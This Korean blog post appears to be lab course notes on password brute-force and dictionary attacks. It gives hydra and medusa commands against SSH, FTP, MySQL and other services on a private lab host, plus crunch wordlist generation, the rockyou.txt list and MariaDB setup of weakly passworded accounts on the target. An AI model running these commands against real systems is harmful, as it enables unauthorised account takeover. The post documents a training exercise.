본문 바로가기
네트워크 해킹

네트워크 해킹 9

by 윤라경 2024. 5. 27.

[2024.05.24 / 2024.05.27]

 

[Brute Force / Dictionary]

 

01. hydra

#hydra -l korea -p 123456 mysql://192.168.10.50 -f -V

 

<옵션>

-M: 여러 개의 타깃 설정

-x: 자동 패스워드 조합

 

 

02. 패스워드  사전 파일 생성

#crunch 3 3 1234567890 -o /root/password.txt

 

02. medusa

 

#medusa -u test -p 123456 -h 192.168.10.50 -M ssh

#medusa -u test -p 123456 -h 192.168.10.50 -M ssh
#medusa -u test -p 123456 -h 192.168.10.50 -M ftp
  #medusa -u test -p 123456 -h 192.168.10.50 -M mysql
  #medusa -u test -p 123456 -h 192.168.10.50 -M http
  #medusa -u test -p 123456 -h 192.168.10.50 -M pop3
  #medusa -u test -p 123456 -h 192.168.10.50 -M imap

 

<옵션>

-u: 계정 지정

-p: 패스워드 지정

-P: 패스워드 사전 파일

-h: 대상 호스트

-M: 프로토콜 지정

 

medusa -u test -p 123456 -h 192.168.10.50 -M ssh 입력 후 [SUCCESS]가 나오면 된다

 

 

ftp와 mysql로 테스트도 할 수 있지만 mysql에서는 [SUCCESS]가 나오지 않는다

 

===========================================================

 

CentOS7에서 실행

 

[Mariadb]

 

> MySQL 접속

#mysql -p mysql

 

> 데이터베이스 생성

MariaDB [mysql]> create database korea;

 

> 계정 생성

MariaDB [mysql]> create user 'korea'@' localhost' identified by '123456';

MariaDB [mysql]> create user 'korea1'@' %' identified by '123456';

 

> 권한 부여

MariaDB [mysql]> grant all privileges on korea.* to 'korea'@'localhost' identified by '123456';

MariaDB [mysql]> grant all privileges on korea.* to 'korea1'@'%' identified by '123456';

 

> 적용

MariaDB [mysql]> flush privileges;

 

>DB 재시작

#systemctl restart mariadb

 

 

============================================================

 

MariaDB [mysql]> create user 'korea1'@' 192.168.10.250' identified by '123456';

MariaDB [mysql]> create user 'korea1'@' 192.168.%.%' identified by '123456';

MariaDB [mysql]> create user 'korea1'@' 192.168.10.%' identified by '123456';

 

...

 

Kali Linux 이동 후

 

hydra -l korea -p 123456 mysql://192.168.10.50 -f -V

 

 

hydra -l korea1 -p 123456 mysql://192.168.10.50 -f -V

 

각각 입력 후 결과값 확인

 

hydra -L /root/id.txt -s 2002 -P /root/pass.txt ssh://192.168.10.50 -f -V

vi id.txt

korea와 korea1 입력 후 저장

 

hydra -L /root/id.txt -P /root/pass.txt mysql://192.168.10.50 -f -V

해당 명령어 실행 시 확인 가능

 

---------------------------------------------------------------------------------------------------------

 

CentOS7에서

[root@localhost ssh]# passwd test로 12a 패스워드 설정

 

Kali Linux로 이동 후

 

107  cd /usr/share/wordlists
  108  ll
  109  gzip -d rockyou.txt.gz(rockyou라는 해커들이 만들어 놓은 패스워드 모음집 압축 해제)
  110  ll
  111  cat rockyou.txt
  112  wc rockyou.txt

 

hydra -l test -P /usr/share/wordlists/rockyou.txt ssh://192.168.10.50 -V -f

 

해당 명령어 입력 후 모음집 안에서 12a라는 패스워드 찾기 시도

'네트워크 해킹' 카테고리의 다른 글

네트워크 해킹 11  (0) 2024.05.29
네트워크 해킹 10  (0) 2024.05.29
네트워크 해킹 8  (0) 2024.05.26
네트워크 해킹 7  (0) 2024.05.26
네트워크 해킹 6  (0) 2024.05.26